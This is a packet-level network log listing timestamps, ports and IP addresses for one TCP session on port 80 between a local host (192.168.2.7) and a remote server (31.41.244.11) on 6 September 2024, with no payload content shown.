Sep 6, 2024 09:58:06.745305061 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745316029 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745316982 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745327950 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745338917 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745352030 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745352030 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745364904 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745373964 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745378971 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745392084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745392084 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745429993 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745439053 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745441914 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745451927 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745490074 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745501995 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745513916 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745539904 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745554924 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745651960 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745665073 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745676994 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745688915 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745698929 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745698929 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745712996 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745719910 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745723963 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745734930 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745748043 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745748043 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745759010 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745762110 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745773077 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.745790958 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.745809078 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.746217966 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.746252060 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.746262074 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.746284008 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.746293068 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.746324062 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.746436119 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.746448994 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.746470928 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.746478081 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.746483088 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.746529102 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.746529102 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.777302027 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777334929 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777348042 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777359962 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777374029 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777374029 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.777385950 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777405024 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.777409077 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777431965 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777452946 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777461052 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.777465105 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777481079 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.777489901 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777501106 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777510881 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.777513027 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777525902 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777539015 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.777539968 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.777559042 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.777575016 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.034776926 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.034826040 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.034838915 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.034852982 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.034873009 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.034885883 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.034893036 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.034893036 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.034898043 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.034907103 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.034910917 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.034921885 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.034923077 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.034936905 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.034945965 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.034949064 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.034981012 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.034985065 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035002947 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035015106 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035022974 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035027027 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035041094 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035052061 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035059929 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035064936 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035078049 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035079956 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035096884 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035099030 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035105944 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035111904 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035115957 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035118103 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035142899 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035151005 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035168886 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035171032 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035181999 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035185099 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035195112 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035207987 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035211086 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035222054 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035228014 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035237074 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035239935 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035255909 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035258055 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035270929 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035284042 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035303116 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035307884 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035315037 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035326004 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035337925 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035341024 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035348892 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035358906 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035361052 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035375118 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035387039 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035388947 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035398960 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035408974 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035410881 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035428047 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035459042 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035461903 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035471916 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035485029 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035489082 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035497904 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035511971 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035516024 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035525084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035537958 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035542011 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035559893 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035564899 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035578966 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035589933 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035590887 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035602093 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035619020 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035619974 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035630941 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035638094 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035643101 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035655022 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035665989 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035669088 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035681963 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035686970 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035698891 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035717964 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035729885 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035737038 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035741091 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035753012 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035762072 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035765886 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035778046 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035789967 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035794973 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035815001 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035820961 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035832882 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035834074 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035845041 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035857916 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035860062 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035868883 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035881996 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035887957 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035892010 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035904884 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035906076 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035917044 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035928965 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035933971 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035950899 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035958052 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035972118 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.035979033 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.035985947 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036000013 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036005974 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036011934 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036025047 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036034107 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036036968 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036047935 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036048889 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036061049 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036073923 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036075115 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036103010 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036107063 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036118031 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036118984 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036124945 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036134958 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036145926 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036149025 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036156893 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036169052 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036173105 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036181927 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036195040 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036201954 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036206961 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036221981 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036231041 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036248922 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036252022 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036263943 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036273956 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036274910 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036288977 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036293030 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036300898 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036312103 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036318064 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036324024 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036334038 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036335945 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036340952 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036345959 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036353111 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036367893 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036367893 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036387920 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036405087 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036417961 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036425114 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036425114 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036429882 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036441088 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036443949 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036458015 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036462069 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036464930 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036470890 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036477089 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036492109 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036493063 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036499977 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036505938 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036506891 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036514044 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036519051 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036520958 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036529064 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036535978 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036541939 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036545038 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036547899 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036552906 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036557913 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036564112 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036567926 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036581039 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036590099 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036602974 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036612034 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036614895 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036627054 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036628008 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036639929 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036642075 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036652088 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036664009 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036668062 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036676884 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036689997 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036709070 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036709070 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036725998 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036730051 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036737919 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036748886 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036761045 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036770105 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036772966 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036783934 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036784887 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036806107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036818981 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036825895 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036825895 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036829948 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036842108 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036854982 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036869049 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036878109 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036880970 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036895990 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036905050 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036906958 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036916971 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036930084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036940098 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036942959 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036942959 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036952972 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036962986 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036964893 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036981106 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.036988020 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.036993980 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037005901 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037008047 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037017107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037029028 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037041903 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037043095 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:07.037060022 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:07.037060022 CEST	49719	80	192.168.2.7	31.41.244.11
